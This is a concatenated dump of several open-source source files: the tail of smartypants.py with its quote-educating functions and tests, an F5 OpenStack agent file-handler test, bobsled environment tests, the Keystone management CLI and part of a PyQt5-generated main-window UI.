theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license::
smartypants.py is a derivative work of SmartyPants.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
.. _John Gruber: http://daringfireball.net/
.. _Chad Miller: http://web.chad.org/
.. _Pyblosxom: http://roughingit.subtlehints.net/pyblosxom
.. _SmartyPants: http://daringfireball.net/projects/smartypants/
.. _Movable Type: http://www.movabletype.org/
"""
# TODO: Add usage examples
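# A minimal usage sketch (assumes this module is importable as ``smartypants``;
# the calls below are illustrative, not canonical tests -- see the unit tests
# at the bottom of this file for verified behaviour):
#
#     from smartypants import smartyPants
#     educated = smartyPants('"Isn\'t this fun?"')                  # default "B1": educate quotes only
#     as_unicode = smartyPants('"Hello" -- world', attr="1", unicode=True)  # all transformations, unicode output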
default_smartypants_attr = "B1" # Like a BOSS!
import re
import htmlentitydefs
tags_to_skip_regex = re.compile(r"<(/)?(pre|code|tt|kbd|script|math)[^>]*>", re.I)
def verify_installation(request):
return 1
# assert the plugin is functional
def cb_story(args):
global default_smartypants_attr
try:
forbidden_flavours = args["entry"]["smartypants_forbidden_flavours"]
except KeyError:
forbidden_flavours = [ "rss" ]
try:
attributes = args["entry"]["smartypants_attributes"]
except KeyError:
attributes = default_smartypants_attr
if attributes is None:
attributes = default_smartypants_attr
entryData = args["entry"].getData()
try:
if args["request"]["flavour"] in forbidden_flavours:
return
except KeyError:
if "<" in args["entry"]["body"][0:15]: # sniff the stream
return # abort if it looks like escaped HTML. FIXME
# FIXME: make these configurable, perhaps?
args["entry"]["body"] = smartyPants(entryData, attributes)
args["entry"]["title"] = smartyPants(args["entry"]["title"], attributes)
### interal functions below here
def smartyPants(text, attr=default_smartypants_attr, **kwargs):
"""Docstring.
Parameters
----------
unicode : bool
convert to unicode. If True a unicode string is returned (if required?)
and if False an HTML encoded string is returned.
"""
    convert_quot = "0" # should we translate &quot; entities into normal quotes?
# Parse attributes:
# 0 : do nothing
# 1 : set all
# 2 : set all, using old school en- and em- dash shortcuts
# 3 : set all, using inverted old school en and em- dash shortcuts
#
# q : quotes
# b : backtick quotes (``double'' only)
# B : backtick quotes (``double'' and `single')
# d : dashes
# D : old school dashes
# i : inverted old school dashes
# e : ellipses
    # w : convert &quot; entities to " for Dreamweaver users
skipped_tag_stack = []
do_dashes = "0"
do_backticks = "0"
do_quotes = "0"
do_ellipses = "0"
do_stupefy = "0"
if attr == "0":
# Do nothing.
return text
elif attr == "1":
do_quotes = "1"
do_backticks = "1"
do_dashes = "1"
do_ellipses = "1"
elif attr == "2":
# Do everything, turn all options on, use old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "2"
do_ellipses = "1"
elif attr == "3":
# Do everything, turn all options on, use inverted old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "3"
do_ellipses = "1"
elif attr == "-1":
# Special "stupefy" mode.
do_stupefy = "1"
# BOND Shorthands
elif attr == "B1":
do_quotes = "1"
else:
for c in attr:
if c == "q": do_quotes = "1"
elif c == "b": do_backticks = "1"
elif c == "B": do_backticks = "2"
elif c == "d": do_dashes = "1"
elif c == "D": do_dashes = "2"
elif c == "i": do_dashes = "3"
elif c == "e": do_ellipses = "1"
elif c == "w": convert_quot = "1"
else:
pass
# ignore unknown option
tokens = _tokenize(text)
result = []
in_pre = False
prev_token_last_char = ""
# This is a cheat, used to get some context
# for one-character tokens that consist of
# just a quote char. What we do is remember
# the last character of the previous text
# token, to use as context to curl single-
# character quote tokens correctly.
for cur_token in tokens:
if cur_token[0] == "tag":
# Don't mess with quotes inside some tags. This does not handle self <closing/> tags!
result.append(cur_token[1])
skip_match = tags_to_skip_regex.match(cur_token[1])
if skip_match is not None:
if not skip_match.group(1):
skipped_tag_stack.append(skip_match.group(2).lower())
in_pre = True
else:
if len(skipped_tag_stack) > 0:
if skip_match.group(2).lower() == skipped_tag_stack[-1]:
skipped_tag_stack.pop()
else:
pass
# This close doesn't match the open. This isn't XHTML. We should barf here.
if len(skipped_tag_stack) == 0:
in_pre = False
else:
t = cur_token[1]
last_char = t[-1:] # Remember last char of this token before processing.
if not in_pre:
oldstr = t
if kwargs.get('process_escapes', False): # only process escapes if requested.
t = processEscapes(t)
if convert_quot != "0":
                    t = re.sub('&quot;', '"', t)
if do_dashes != "0":
if do_dashes == "1":
t = educateDashes(t)
if do_dashes == "2":
t = educateDashesOldSchool(t)
if do_dashes == "3":
t = educateDashesOldSchoolInverted(t)
if do_ellipses != "0":
t = educateEllipses(t)
# Note: backticks need to be processed before quotes.
if do_backticks != "0":
t = educateBackticks(t)
if do_backticks == "2":
t = educateSingleBackticks(t)
if do_quotes != "0":
if t == "'":
# Special case: single-character ' token
if re.match("\S", prev_token_last_char):
t = "’"
else:
t = "‘"
elif t == '"':
# Special case: single-character " token
if re.match("\S", prev_token_last_char):
t = "”"
else:
t = "“"
else:
# Normal case:
t = educateQuotes(t)
if do_stupefy == "1":
t = stupefyEntities(t)
prev_token_last_char = last_char
result.append(t)
output_text = "".join(result)
if kwargs.get('unicode'):
output_text = unescape_html(output_text)
return output_text
def educateQuotes(str):
"""
Parameter: String.
Returns: The string, with "educated" curly quote HTML entities.
Example input: "Isn't this fun?"
Example output: “Isn’t this fun?”
"""
oldstr = str
punct_class = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
str = re.sub(r"""^'(?=%s\\B)""" % (punct_class,), r"""’""", str)
str = re.sub(r"""^"(?=%s\\B)""" % (punct_class,), r"""”""", str)
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
str = re.sub(r""""'(?=\w)""", """“‘""", str)
str = re.sub(r"""'"(?=\w)""", """‘“""", str)
# Special case for decade abbreviations (the '80s):
str = re.sub(r"""\b'(?=\d{2}s)""", r"""’""", str)
close_class = r"""[^\ \t\r\n\[\{\(\-]"""
dec_dashes = r"""–|—"""
# Get most opening single quotes:
opening_single_quotes_regex = re.compile(r"""
(
        \s | # a whitespace char, or
        &nbsp; | # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
' # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_single_quotes_regex.sub(r"""\1‘""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(?!\s | s\b | \d)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(\s | s\b)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’\2""", str)
# Any remaining single quotes should be opening ones:
str = re.sub(r"""'""", r"""‘""", str)
# Get most opening double quotes:
opening_double_quotes_regex = re.compile(r"""
(
        \s | # a whitespace char, or
        &nbsp; | # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
" # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_double_quotes_regex.sub(r"""\1“""", str)
# Double closing quotes:
closing_double_quotes_regex = re.compile(r"""
#(%s)? # character that indicates the quote should be closing
"
(?=\s)
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""”""", str)
closing_double_quotes_regex = re.compile(r"""
(%s) # character that indicates the quote should be closing
"
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""\1”""", str)
# Any remaining quotes should be opening ones.
str = re.sub(r'"', r"""“""", str)
return str
def educateBackticks(str):
"""
Parameter: String.
Returns: The string, with ``backticks'' -style double quotes
translated into HTML curly quote entities.
Example input: ``Isn't this fun?''
Example output: “Isn't this fun?”
"""
str = re.sub(r"""``""", r"""“""", str)
str = re.sub(r"""''""", r"""”""", str)
return str
def educateSingleBackticks(str):
"""
Parameter: String.
Returns: The string, with `backticks' -style single quotes
translated into HTML curly quote entities.
Example input: `Isn't this fun?'
Example output: ‘Isn’t this fun?’
"""
str = re.sub(r"""`""", r"""‘""", str)
str = re.sub(r"""'""", r"""’""", str)
return str
def educateDashes(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""–""", str) # en (yes, backwards)
str = re.sub(r"""--""", r"""—""", str) # em (yes, backwards)
return str
def educateDashesOldSchool(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an en-dash HTML entity, and each "---" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""—""", str) # em (yes, backwards)
str = re.sub(r"""--""", r"""–""", str) # en (yes, backwards)
return str
def educateDashesOldSchoolInverted(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity, and each "---" translated to
an en-dash HTML entity. Two reasons why: First, unlike the
en- and em-dash syntax supported by
EducateDashesOldSchool(), it's compatible with existing
entries written before SmartyPants 1.1, back when "--" was
only used for em-dashes. Second, em-dashes are more
common than en-dashes, and so it sort of makes sense that
the shortcut should be shorter to type. (Thanks to Aaron
Swartz for the idea.)
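                Illustrative example (not part of the original docstring):
                Example input:   dashes -- here and --- there
                Example output:  dashes — here and – there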
"""
str = re.sub(r"""---""", r"""–""", str) # em
str = re.sub(r"""--""", r"""—""", str) # en
return str
def educateEllipses(str):
"""
Parameter: String.
Returns: The string, with each instance of "..." translated to
an ellipsis HTML entity.
Example input: Huh...?
Example output: Huh…?
"""
str = re.sub(r"""\.\.\.""", r"""…""", str)
str = re.sub(r"""\. \. \.""", r"""…""", str)
return str
def stupefyEntities(str):
"""
Parameter: String.
Returns: The string, with each SmartyPants HTML entity translated to
its ASCII counterpart.
Example input: “Hello — world.”
Example output: "Hello -- world."
"""
str = re.sub(r"""–""", r"""-""", str) # en-dash
str = re.sub(r"""—""", r"""--""", str) # em-dash
str = re.sub(r"""‘""", r"""'""", str) # open single quote
str = re.sub(r"""’""", r"""'""", str) # close single quote
str = re.sub(r"""“""", r'''"''', str) # open double quote
str = re.sub(r"""”""", r'''"''', str) # close double quote
str = re.sub(r"""…""", r"""...""", str)# ellipsis
return str
def processEscapes(str):
r"""
Parameter: String.
    Returns:    The string, with the following backslash escape sequences
                processed into decimal-encoded HTML entities. This is useful
                if you want to force a "dumb" quote or other character to
                appear.
    Escape  Value
    ------  -----
    \\      &#92;
    \"      &#34;
    \'      &#39;
    \.      &#46;
    \-      &#45;
    \`      &#96;
"""
    str = re.sub(r"""\\\\""", r"""&#92;""", str)
    str = re.sub(r'''\\"''', r"""&#34;""", str)
    str = re.sub(r"""\\'""", r"""&#39;""", str)
    str = re.sub(r"""\\\.""", r"""&#46;""", str)
    str = re.sub(r"""\\-""", r"""&#45;""", str)
    str = re.sub(r"""\\`""", r"""&#96;""", str)
return str
def _tokenize(str):
"""
Parameter: String containing HTML markup.
Returns: Reference to an array of the tokens comprising the input
string. Each token is either a tag (possibly with nested,
tags contained therein, such as <a href="<MTFoo>">, or a
run of text between tags. Each element of the array is a
two-element array; the first is either 'tag' or 'text';
the second is the actual value.
Based on the _tokenize() subroutine from Brad Choate's MTRegex plugin.
<http://www.bradchoate.com/past/mtregex.php>
"""
pos = 0
length = len(str)
tokens = []
depth = 6
nested_tags = "|".join(['(?:<(?:[^<>]',] * depth) + (')*>)' * depth)
#match = r"""(?: <! ( -- .*? -- \s* )+ > ) | # comments
# (?: <\? .*? \?> ) | # directives
# %s # nested tags """ % (nested_tags,)
tag_soup = re.compile(r"""([^<]*)(<[^>]*>)""")
token_match = tag_soup.search(str)
previous_end = 0
while token_match is not None:
if token_match.group(1):
tokens.append(['text', token_match.group(1)])
tokens.append(['tag', token_match.group(2)])
previous_end = token_match.end()
token_match = tag_soup.search(str, token_match.end())
if previous_end < len(str):
tokens.append(['text', str[previous_end:]])
return tokens
### New Functions
def unescape_html(text):
"""Replaces HTML/XML character references in a string with unicode
encodings.
SRC: http://effbot.org/zone/re-sub.htm#unescape-html
`October 28, 2006 | Fredrik Lundh`
:param text: HTML/XML encoded source text
:rtype: string or unicode (if necessary)
"""
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
return re.sub("&#?\w+;", fixup, text)
if __name__ == "__main__":
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_string
docstring_html = publish_string(__doc__, writer_name='html')
print docstring_html
# Unit test output goes out stderr. No worries.
import unittest
sp = smartyPants
class TestSmartypantsAllAttributes(unittest.TestCase):
# the default attribute is "1", which means "all".
def test_dates(self):
self.assertEqual(sp("1440-80's"), "1440-80’s")
self.assertEqual(sp("1440-'80s"), "1440-‘80s")
self.assertEqual(sp("1440---'80s"), "1440–‘80s")
self.assertEqual(sp("1960s"), "1960s") # no effect.
self.assertEqual(sp("1960's"), "1960’s")
self.assertEqual(sp("one two '60s"), "one two ‘60s")
self.assertEqual(sp("'60s"), "‘60s")
def test_skip_tags(self):
self.assertEqual(
sp("""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>"""),
"""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>""")
self.assertEqual(
sp("""<p>He said "Let's write some code." This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>"""),
"""<p>He said “Let’s write some code.” This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>""")
def test_ordinal_numbers(self):
self.assertEqual(sp("21st century"), "21st century") # no effect.
self.assertEqual(sp("3rd"), "3rd") # no effect.
def test_educated_quotes(self):
self.assertEqual(sp('''"Isn't this fun?"'''), '''“Isn’t this fun?”''')
unittest.main()
__author__ = "Anthony O'Brien <[email protected]>"
__version__ = "1.5_2.0"
__url__ = "https://github.com/bondgifts/python-smartypants"
__description__ = "Smart-quotes, smart-ellipses, and smart-dashes for unicode and HTML/XML usage."
| bsd-3-clause | 1,224,853,548,445,480,000 | 34.093333 | 209 | 0.594868 | false |
F5Networks/f5-openstack-agent | f5_openstack_agent/lbaasv2/drivers/bigip/test/test_esd_filehandler.py | 1 | 3416 | # coding=utf-8
# Copyright (c) 2017,2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5_openstack_agent.lbaasv2.drivers.bigip.esd_filehandler import \
EsdJSONValidation
from f5_openstack_agent.lbaasv2.drivers.bigip import exceptions as f5_ex
class TestEsdFileHanlder(object):
remaining_path = 'f5_openstack_agent/lbaasv2/drivers/bigip/test/json'
@staticmethod
def assertEqual(obj1, obj2, note=''):
assert obj1 == obj2, note
@staticmethod
def assertRaises(exc):
return pytest.raises(exc)
@staticmethod
def assertIn(obj1, dict_obj, note=''):
assert obj1 in dict_obj, note
def test_invalid_dir_name(self):
        # invalid directory name
reader = EsdJSONValidation('/as87awoiujasdf/')
assert not reader.esdJSONFileList
def test_no_files(self, get_relative_path):
# verify no files in empty directory
reader = EsdJSONValidation(
'{}/{}/empty_dir'.format(get_relative_path, self.remaining_path))
assert not reader.esdJSONFileList
def test_no_json_files(self, get_relative_path):
# verify no files are read in dir that contains non-JSON files
reader = EsdJSONValidation(
'{}/{}/no_json'.format(get_relative_path, self.remaining_path))
assert not reader.esdJSONFileList
def test_mix_json_files(self, get_relative_path):
# verify single JSON file
reader = EsdJSONValidation(
'{}/{}/mix_json/'.format(get_relative_path, self.remaining_path))
self.assertEqual(1, len(reader.esdJSONFileList))
def test_json_only_files(self, get_relative_path):
# expect three files
reader = EsdJSONValidation(
'{}/{}/valid'.format(get_relative_path, self.remaining_path))
self.assertEqual(3, len(reader.esdJSONFileList))
def test_invalid_json(self, get_relative_path):
handler = EsdJSONValidation(
'{}/{}/invalid'.format(get_relative_path, self.remaining_path))
# verify exception raised
with self.assertRaises(f5_ex.esdJSONFileInvalidException):
handler.read_json()
def test_valid_json(self, get_relative_path):
handler = EsdJSONValidation(
'{}/{}/valid/'.format(get_relative_path, self.remaining_path))
dict = handler.read_json()
# verify keys in the final dictionary
self.assertIn('app_type_1', dict)
self.assertIn('app_type_2', dict)
self.assertIn('app_type_3', dict)
def test_empty_json(self, get_relative_path):
# verify empty file is read
handler = EsdJSONValidation(
'{}/{}/empty_file/'.format(get_relative_path, self.remaining_path))
self.assertEqual(1, len(handler.esdJSONFileList))
# verify empty dict is returned
dict = handler.read_json()
assert not dict
| apache-2.0 | -3,588,960,012,076,840,400 | 35.340426 | 79 | 0.668326 | false |
openstates/bobsled | bobsled/tests/test_environment.py | 1 | 1546 | import os
import pytest
from unittest import mock
from ..environment import EnvironmentProvider
from ..base import Environment
@pytest.fixture
def simpleenv():
filename = os.path.join(os.path.dirname(__file__), "environments.yml")
return EnvironmentProvider(filename)
@pytest.mark.asyncio
async def test_get_environment_names(simpleenv):
await simpleenv.update_environments()
assert set(simpleenv.get_environment_names()) == {"one", "two"}
@pytest.mark.asyncio
async def test_get_environment(simpleenv):
await simpleenv.update_environments()
assert simpleenv.get_environment("one") == Environment(
"one", {"number": 123, "word": "hello"}, ["word"]
)
@pytest.mark.asyncio
async def test_mask_variables(simpleenv):
await simpleenv.update_environments()
assert (
simpleenv.mask_variables("hello this is a test, but 123 is masked")
== "hello this is a test, but **ONE/NUMBER** is masked"
)
@pytest.mark.asyncio
async def test_get_environment_paramstore():
filename = os.path.join(os.path.dirname(__file__), "paramstore_env.yml")
psenv = EnvironmentProvider(filename)
# patch paramstore loader so we don't have to do a bunch of moto stuff that
# doesn't really work well with async
with mock.patch("bobsled.environment.paramstore_loader", new=lambda x: "ps-" + x):
await psenv.update_environments()
assert psenv.get_environment("one") == Environment(
"one", {"number": "ps-/bobsledtest/number", "word": "ps-/bobsledtest/word"}, []
)
| mit | -3,136,788,783,062,574,600 | 31.893617 | 87 | 0.695343 | false |
ging/keystone | keystone/cli.py | 1 | 11656 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from oslo.config import cfg
import pbr.version
from keystone import assignment
from keystone.common import openssl
from keystone.common import sql
from keystone.common.sql import migration_helpers
from keystone.common import utils
from keystone import config
from keystone.i18n import _
from keystone import identity
from keystone.openstack.common import log
from keystone import token
LOG = log.getLogger(__name__)
CONF = config.CONF
class BaseApp(object):
name = None
@classmethod
def add_argument_parser(cls, subparsers):
parser = subparsers.add_parser(cls.name, help=cls.__doc__)
parser.set_defaults(cmd_class=cls)
return parser
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(DbSync, cls).add_argument_parser(subparsers)
parser.add_argument('version', default=None, nargs='?',
help=('Migrate the database up to a specified '
'version. If not provided, db_sync will '
'migrate the database to the latest known '
'version.'))
parser.add_argument('--extension', default=None,
help=('Migrate the database for the specified '
'extension. If not provided, db_sync will '
'migrate the common repository.'))
parser.add_argument('--populate', action='store_true',
                            help=('Populate the database with initial data '
'instead of migrating tables. Only use '
'this option after running all migrations. '
'This option is not compatible with the '
'version or extension options. '
'If not provided, db_sync will function '
'normally.'))
return parser
@staticmethod
def main():
version = CONF.command.version
extension = CONF.command.extension
populate = CONF.command.populate
if populate:
extension = 'initial_data'
migration_helpers.sync_database_to_version(extension, version)
class DbVersion(BaseApp):
"""Print the current migration version of the database."""
name = 'db_version'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(DbVersion, cls).add_argument_parser(subparsers)
parser.add_argument('--extension', default=None,
help=('Migrate the database for the specified '
'extension. If not provided, db_sync will '
'migrate the common repository.'))
@staticmethod
def main():
extension = CONF.command.extension
migration_helpers.print_db_version(extension)
class BaseCertificateSetup(BaseApp):
"""Common user/group setup for PKI and SSL generation."""
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(BaseCertificateSetup,
cls).add_argument_parser(subparsers)
running_as_root = (os.geteuid() == 0)
parser.add_argument('--keystone-user', required=running_as_root)
parser.add_argument('--keystone-group', required=running_as_root)
parser.add_argument('--rebuild', default=False, action='store_true',
help=('Rebuild certificate files: erase previous '
'files and regenerate them.'))
return parser
@staticmethod
def get_user_group():
keystone_user_id = None
keystone_group_id = None
try:
a = CONF.command.keystone_user
if a:
keystone_user_id = utils.get_unix_user(a)[0]
except KeyError:
raise ValueError("Unknown user '%s' in --keystone-user" % a)
try:
a = CONF.command.keystone_group
if a:
keystone_group_id = utils.get_unix_group(a)[0]
except KeyError:
raise ValueError("Unknown group '%s' in --keystone-group" % a)
return keystone_user_id, keystone_group_id
class PKISetup(BaseCertificateSetup):
"""Set up Key pairs and certificates for token signing and verification.
This is NOT intended for production use, see Keystone Configuration
documentation for details.
"""
name = 'pki_setup'
@classmethod
def main(cls):
msg = _('keystone-manage pki_setup is not recommended for production '
'use.')
LOG.warn(msg)
keystone_user_id, keystone_group_id = cls.get_user_group()
conf_pki = openssl.ConfigurePKI(keystone_user_id, keystone_group_id,
rebuild=CONF.command.rebuild)
conf_pki.run()
class SSLSetup(BaseCertificateSetup):
"""Create key pairs and certificates for HTTPS connections.
This is NOT intended for production use, see Keystone Configuration
documentation for details.
"""
name = 'ssl_setup'
@classmethod
def main(cls):
msg = _('keystone-manage ssl_setup is not recommended for production '
'use.')
LOG.warn(msg)
keystone_user_id, keystone_group_id = cls.get_user_group()
conf_ssl = openssl.ConfigureSSL(keystone_user_id, keystone_group_id,
rebuild=CONF.command.rebuild)
conf_ssl.run()
class TokenFlush(BaseApp):
"""Flush expired tokens from the backend."""
name = 'token_flush'
@classmethod
def main(cls):
token_manager = token.persistence.PersistenceManager()
token_manager.driver.flush_expired_tokens()
class MappingPurge(BaseApp):
"""Purge the mapping table."""
name = 'mapping_purge'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(MappingPurge, cls).add_argument_parser(subparsers)
parser.add_argument('--all', default=False, action='store_true',
help=('Purge all mappings.'))
parser.add_argument('--domain-name', default=None,
help=('Purge any mappings for the domain '
'specified.'))
parser.add_argument('--public-id', default=None,
help=('Purge the mapping for the Public ID '
'specified.'))
parser.add_argument('--local-id', default=None,
help=('Purge the mappings for the Local ID '
'specified.'))
parser.add_argument('--type', default=None, choices=['user', 'group'],
help=('Purge any mappings for the type '
'specified.'))
return parser
@staticmethod
def main():
def validate_options():
# NOTE(henry-nash); It would be nice to use the argparse automated
# checking for this validation, but the only way I can see doing
# that is to make the default (i.e. if no optional parameters
# are specified) to purge all mappings - and that sounds too
# dangerous as a default. So we use it in a slightly
# unconventional way, where all parameters are optional, but you
# must specify at least one.
if (CONF.command.all is False and
CONF.command.domain_name is None and
CONF.command.public_id is None and
CONF.command.local_id is None and
CONF.command.type is None):
raise ValueError(_('At least one option must be provided'))
if (CONF.command.all is True and
(CONF.command.domain_name is not None or
CONF.command.public_id is not None or
CONF.command.local_id is not None or
CONF.command.type is not None)):
raise ValueError(_('--all option cannot be mixed with '
'other options'))
def get_domain_id(name):
try:
identity.Manager()
assignment_manager = assignment.Manager()
return assignment_manager.driver.get_domain_by_name(name)['id']
except KeyError:
raise ValueError(_("Unknown domain '%(name)s' specified by "
"--domain-name") % {'name': name})
validate_options()
# Now that we have validated the options, we know that at least one
# option has been specified, and if it was the --all option then this
# was the only option specified.
#
# The mapping dict is used to filter which mappings are purged, so
# leaving it empty means purge them all
mapping = {}
if CONF.command.domain_name is not None:
mapping['domain_id'] = get_domain_id(CONF.command.domain_name)
if CONF.command.public_id is not None:
mapping['public_id'] = CONF.command.public_id
if CONF.command.local_id is not None:
mapping['local_id'] = CONF.command.local_id
if CONF.command.type is not None:
mapping['type'] = CONF.command.type
mapping_manager = identity.MappingManager()
mapping_manager.driver.purge_mappings(mapping)
class SamlIdentityProviderMetadata(BaseApp):
"""Generate Identity Provider metadata."""
name = 'saml_idp_metadata'
@staticmethod
def main():
# NOTE(marek-denis): Since federation is currently an extension import
# corresponding modules only when they are really going to be used.
from keystone.contrib.federation import idp
metadata = idp.MetadataGenerator().generate_metadata()
print(metadata.to_string())
CMDS = [
DbSync,
DbVersion,
MappingPurge,
PKISetup,
SamlIdentityProviderMetadata,
SSLSetup,
TokenFlush,
]
def add_command_parsers(subparsers):
for cmd in CMDS:
cmd.add_argument_parser(subparsers)
command_opt = cfg.SubCommandOpt('command',
title='Commands',
help='Available commands',
handler=add_command_parsers)
def main(argv=None, config_files=None):
CONF.register_cli_opt(command_opt)
config.configure()
sql.initialize()
config.set_default_for_default_log_levels()
CONF(args=argv[1:],
project='keystone',
version=pbr.version.VersionInfo('keystone').version_string(),
usage='%(prog)s [' + '|'.join([cmd.name for cmd in CMDS]) + ']',
default_config_files=config_files)
config.setup_logging()
CONF.command.cmd_class.main()
| apache-2.0 | -4,861,469,383,268,838,000 | 34.975309 | 79 | 0.590254 | false |
hueyyeng/AssetsBrowser | ui/window/ui_main.py | 1 | 12124 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'K:\Library\Python\AssetsBrowser\ui\window\main.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(851, 603)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(800, 600))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
MainWindow.setFont(font)
MainWindow.setDocumentMode(False)
MainWindow.setTabShape(QtWidgets.QTabWidget.Rounded)
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralWidget.sizePolicy().hasHeightForWidth())
self.centralWidget.setSizePolicy(sizePolicy)
self.centralWidget.setMinimumSize(QtCore.QSize(800, 550))
self.centralWidget.setObjectName("centralWidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralWidget)
self.gridLayout.setObjectName("gridLayout")
self.splitter = QtWidgets.QSplitter(self.centralWidget)
self.splitter.setEnabled(True)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName("splitter")
self.actionWidget = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.actionWidget.sizePolicy().hasHeightForWidth())
self.actionWidget.setSizePolicy(sizePolicy)
self.actionWidget.setMinimumSize(QtCore.QSize(230, 0))
self.actionWidget.setMaximumSize(QtCore.QSize(230, 16777215))
self.actionWidget.setObjectName("actionWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.actionWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.labelProject = QtWidgets.QLabel(self.actionWidget)
self.labelProject.setObjectName("labelProject")
self.verticalLayout.addWidget(self.labelProject)
self.projectComboBox = QtWidgets.QComboBox(self.actionWidget)
self.projectComboBox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.projectComboBox.setSizeAdjustPolicy(QtWidgets.QComboBox.AdjustToContentsOnFirstShow)
self.projectComboBox.setFrame(True)
self.projectComboBox.setObjectName("projectComboBox")
self.verticalLayout.addWidget(self.projectComboBox)
